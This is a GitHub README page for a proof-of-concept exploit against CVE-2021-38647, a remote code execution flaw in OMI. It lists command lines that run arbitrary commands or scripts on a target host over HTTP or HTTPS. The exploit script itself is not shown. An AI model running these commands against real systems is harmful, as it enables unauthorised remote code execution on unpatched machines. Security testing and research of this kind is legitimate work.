Skip to content

Latest commit

 

History

History
22 lines (18 loc) · 613 Bytes

README.md

File metadata and controls

22 lines (18 loc) · 613 Bytes

cve-2021-38647

A PoC exploit for CVE-2021-38647 RCE in OMI.

Execute a single command using ExecuteShellCommand on the default HTTPS port:

python cve-2021-38647.py -s 10.10.10.10 shell id

Execute a single command using ExecuteShellCommand on the default HTTP port:

python cve-2021-38647.py 10.10.10.10 -p 5985 shell id

Execute a single command using ExecuteScript on the default HTTPS port:

python cve-2021-38647.py -s 10.10.10.10 script -c id

Execute a script using ExecuteScript on the default HTTPS port:

python cve-2021-38647.py -s 10.10.10.10 script -f script.sh